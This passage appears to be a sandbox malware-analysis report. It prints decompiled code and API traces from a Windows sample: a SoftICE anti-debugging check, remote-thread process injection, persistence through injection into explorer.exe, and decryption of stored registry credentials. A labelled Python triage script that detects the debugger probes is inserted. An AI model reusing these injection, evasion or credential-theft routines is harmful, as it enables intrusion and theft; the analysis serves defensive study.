                                    				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%
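E00405850 and E00405814 above are the classic SoftICE presence check: CreateFileA on the kernel-debugger device names \\.\NTICE and \\.\SICE with GENERIC_READ|GENERIC_WRITE (0xC0000000) and OPEN_EXISTING (3); a handle other than INVALID_HANDLE_VALUE means the driver is loaded and the function returns 1. The Python below is an added example, not code from the report or the sample: it parses "APIs" lines in the format this report uses and flags such probes, so that a batch of reports can be triaged for this check without reading each decompiled function. The two device names are taken from the page; \\.\SIWVID (SoftICE's video driver device) is added here as the third name that check routinely probes, and the sample lines are copies of lines from this report, constructed for the example.

```python
"""Added example, not code from the report: parse Joe Sandbox "APIs" lines and flag
CreateFileA probes of SoftICE debugger devices (as in E00405850 / E00405814)."""
import re

# NTICE and SICE are the strings in the report; SIWVID is added by this example.
DEBUGGER_DEVICES = {r"\\.\NTICE", r"\\.\SICE", r"\\.\SIWVID"}
_DEVICES_UPPER = {d.upper() for d in DEBUGGER_DEVICES}

# "• Api.MODULE(arg,arg,...), ref: 0040XXXX", optionally prefixed with
# "Part of subcall function 0040XXXX:" as the report prints for callees.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})\s*$"
)

# Constructed sample: copies of API lines from this report plus one FindFirstFileA
# subcall line; the CloseHandle line repeats the device name in stale stack slots.
SAMPLE_API_LINES = [
    r"• CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D), ref: 0040586A",
    r"• CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080), ref: 00405875",
    r"• CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894), ref: 0040582E",
    r"• CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6",
    r"  • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61), ref: 00405D39",
]


def parse_api_line(line):
    """Return (api, module, [args], ref) for one report line, or None if it is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    api, module, argstr, ref = m.groups()
    args = [a.strip() for a in argstr.split(",")] if argstr.strip() else []
    return api, module, args, ref.upper()


def find_debugger_device_probes(lines):
    """Return [(ref, device)] for every CreateFileA/W whose first argument (the file
    name) is a known debugger device.  Only the first argument is checked: the
    report prints stale stack slots after the real arguments, so a later
    CloseHandle line can repeat the device name without being a probe."""
    hits = []
    for line in lines:
        parsed = parse_api_line(line)
        if parsed is None:
            continue
        api, _module, args, ref = parsed
        if api in ("CreateFileA", "CreateFileW") and args and args[0].upper() in _DEVICES_UPPER:
            hits.append((ref, args[0]))
    return hits


if __name__ == "__main__":
    for ref, dev in find_debugger_device_probes(SAMPLE_API_LINES):
        print(f"{ref}: CreateFileA on {dev} -> SoftICE presence check")
```

Run against the APIs lines of the whole report the two hits at 0040586A and 0040582E are exactly the two functions above; the CreateFileA at 00405DB6 (the file writer E00405D70) is not reported because its first argument is a pointer, not a device name.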

                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v9;
                                    				void* _t13;
                                    				int _t24;
                                    				intOrPtr _t36;
                                    				intOrPtr _t37;
                                    				CHAR* _t40;
                                    				void* _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				void* _t45;
                                    
                                    				_t45 = __eflags;
                                    				_t42 = _t43;
                                    				_t44 = _t43 + 0xfffffff8;
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t42);
                                    				_push(0x405ac7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t44;
                                    				_v9 = 0;
                                    				_t13 = E00405D04(_v8, __ebx, _t45); // executed
                                    				if(_t13 != 0) {
                                    					_push(_t42);
                                    					_push(0x405aa7);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					_t40 = E00401F48(_v8);
                                    					GetFileAttributesA(_t40); // executed
                                    					SetFileAttributesA(_t40, 0); // executed
                                    					_t24 = DeleteFileA(_t40); // executed
                                    					asm("sbb eax, eax");
                                    					_v9 = _t24 + 1;
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    				}
                                    				_pop(_t36);
                                    				 *[fs:eax] = _t36;
                                    				_push(E00405ACE);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
                                    				void* _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _t16;
                                    				void* _t23;
                                    				void* _t31;
                                    				void* _t32;
                                    				void* _t33;
                                    
                                    				_v8 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t33 = E0040387C(__eax, _a8, _v8);
                                    				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
                                    				_t32 = _t16;
                                    				if(_a4 != 0) {
                                    					WaitForSingleObject(_t32, 0xffffffff);
                                    					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
                                    				}
                                    				return _t32;
                                    			}

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				void* _t28;
                                    				intOrPtr _t41;
                                    				intOrPtr _t45;
                                    				intOrPtr _t50;
                                    				intOrPtr _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __eflags;
                                    				_t48 = __esi;
                                    				_t47 = __edi;
                                    				_t50 = _t51;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_push(_t50);
                                    				_push(0x405607);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_push(_t50);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_v8 = 0x100;
                                    				E00402074( &_v12, _v8);
                                    				GetUserNameA(E00401F48(_v12),  &_v8); // executed
                                    				_pop(_t41);
                                    				 *[fs:eax] = _t41;
                                    				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
                                    				_push(_v16);
                                    				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
                                    				_pop(_t28);
                                    				E00401E94(_t28, _v20);
                                    				_t45 = 0x4055b2;
                                    				 *[fs:eax] = _t45;
                                    				_push(E0040560E);
                                    				return E00401AE4( &_v20, 3);
                                    			}

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
                                    				signed char _t5;
                                    
                                    				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
                                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				void* _t8;
                                    
                                    				_t4 = _a12;
                                    				asm("sbb eax, eax");
                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                    				return _t8;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				void* _t8;
                                    
                                    				_t4 = _a12;
                                    				asm("sbb eax, eax");
                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                    				return _t8;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00560000,00000000), ref: 0040116D
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
                                    				long _t2;
                                    				void* _t3;
                                    				void* _t4;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t3 =  *0x40e590; // 0x560000
                                    				_t4 = RtlAllocateHeap(_t3, _t2, __eax); // executed
                                    				return _t4;
                                    			}

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00560000,00000000), ref: 00401131
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 33%
                                    			E00401139(void* __eax) {
                                    				signed int _t2;
                                    				void* _t4;
                                    				signed int _t5;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t4 =  *0x40e590; // 0x560000
                                    				_t5 = HeapFree(_t4, _t2 & 0x00000001, ??); // executed
                                    				asm("sbb eax, eax");
                                    				return  ~_t5 & 0x0000007f;
                                    			}

                                    APIs
                                    • HeapFree.KERNEL32(00560000,00000000), ref: 0040114B
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				struct _PROCESS_INFORMATION _v24;
                                    				struct _STARTUPINFOA _v92;
                                    				char _v96;
                                    				intOrPtr _t21;
                                    				void* _t44;
                                    				intOrPtr* _t50;
                                    				intOrPtr _t53;
                                    				void* _t62;
                                    
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v96 = 0;
                                    				_push(_t62);
                                    				_push(0x40b8fa);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62 + 0xffffffa4;
                                    				_t50 =  *0x40d204; // 0x40e8f8
                                    				E00401D9C( &_v96, "_PERSIST",  *_t50);
                                    				_t44 = E00403568(0, 0, E00401F48(_v96));
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t44);
                                    					_t21 =  *0x40d1cc; // 0x40e924
                                    					_t59 = E00401F9C(_t21);
                                    					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
                                    						E00403738();
                                    						E00403738();
                                    						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
                                    						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
                                    					}
                                    				} else {
                                    					CloseHandle(_t44);
                                    				}
                                    				_pop(_t53);
                                    				 *[fs:eax] = _t53;
                                    				_push(E0040B901);
                                    				return E00401AC0( &_v96);
                                    			}

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				int _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				int _v32;
                                    				int _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char _v48;
                                    				intOrPtr _v52;
                                    				char _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				long _t168;
                                    				long _t238;
                                    				long _t251;
                                    				char* _t259;
                                    				signed int _t260;
                                    				intOrPtr _t262;
                                    				intOrPtr _t323;
                                    				intOrPtr _t326;
                                    				intOrPtr _t327;
                                    				long _t339;
                                    				long _t340;
                                    				intOrPtr _t343;
                                    				intOrPtr _t344;
                                    				void* _t350;
                                    
                                    				_t350 = __fp0;
                                    				_t341 = __esi;
                                    				_t343 = _t344;
                                    				_t262 = 0xd;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t262 = _t262 - 1;
                                    				} while (_t262 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t262;
                                    				_push(__esi);
                                    				_v12 =  *_t1;
                                    				_t259 = __edx;
                                    				_v8 = __eax;
                                    				E0040302C(_v8);
                                    				_push(_t343);
                                    				_push(0x4092a7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t344;
                                    				E00401AC0( &_v80);
                                    				_v16 = 0;
                                    				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
                                    					_v28 = 0x400;
                                    					_t341 = E00401174(_v28);
                                    					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
                                    						_v28 = 0x400;
                                    						_t339 = E00402E08();
                                    						__eflags = _t339;
                                    						if(_t339 >= 0) {
                                    							_t340 = _t339 + 1;
                                    							_t260 = 0;
                                    							__eflags = 0;
                                    							do {
                                    								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
                                    								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
                                    								_push(_v36);
                                    								E00402FBC();
                                    								_t344 = _t344 + 4;
                                    								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
                                    								__eflags = _t238;
                                    								if(_t238 == 0) {
                                    									_v44 = _v40;
                                    									_v48 = _v36;
                                    									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
                                    									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
                                    									_push( &_v56);
                                    									_push(1);
                                    									_push(0);
                                    									_push(0);
                                    									_push( &_v64);
                                    									_push(0);
                                    									_t251 =  &_v48;
                                    									_push(_t251);
                                    									L004086F0();
                                    									__eflags = _t251;
                                    									if(_t251 != 0) {
                                    										_push(_v80);
                                    										_push("Address: ");
                                    										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    										_push(_v88);
                                    										_push(0x4092d4);
                                    										E00401E10();
                                    										_push(_v80);
                                    										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
                                    										_push(_v92);
                                    										_push(0x4092e0);
                                    										E00401E10();
                                    									}
                                    								}
                                    								_t260 = _t260 + 1;
                                    								_t340 = _t340 - 1;
                                    								__eflags = _t340;
                                    							} while (_t340 != 0);
                                    						}
                                    						E00403738();
                                    						_t57 =  &_v16;
                                    						 *_t57 = _v16 + 1;
                                    						__eflags =  *_t57;
                                    					}
                                    				}
                                    				RegCloseKey(_v24);
                                    				L17:
                                    				while(E0040202C(0x4092e0, _v80) > 0) {
                                    					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
                                    					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
                                    					E00401D9C( &_v100, 0x4092e0, _v72);
                                    					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
                                    					E00401B58( &_v80, _v96);
                                    					__eflags = E0040202C(0x4092ec, _v72) - 1;
                                    					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
                                    					E00401E94(_v104, "Address");
                                    					if(__eflags == 0) {
                                    						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
                                    						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    						while(1) {
                                    							_t168 = E0040202C(0x4092d4, _v72);
                                    							__eflags = _t168;
                                    							if(_t168 <= 0) {
                                    								goto L17;
                                    							}
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							_push(_v68);
                                    							_push(0x4092d4);
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
                                    							_push(_v108);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							__eflags = E0040202C(0x4092d4, _v72) - 1;
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
                                    							_push(_v112);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401D58( &_v76, 0x4092e0);
                                    						}
                                    					}
                                    				}
                                    				E00401B14(_v12, _v76);
                                    				_pop(_t323);
                                    				 *[fs:eax] = _t323;
                                    				_push(E004092AE);
                                    				E00401AE4( &_v112, 7);
                                    				E00402108( &_v84);
                                    				E00401AE4( &_v80, 4);
                                    				_t326 =  *0x408e34; // 0x408e38
                                    				E00402FC8( &_v40, _t326);
                                    				E00401AC0( &_v20);
                                    				_t327 =  *0x408730; // 0x408734
                                    				return E00402FC8( &_v8, _t327);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
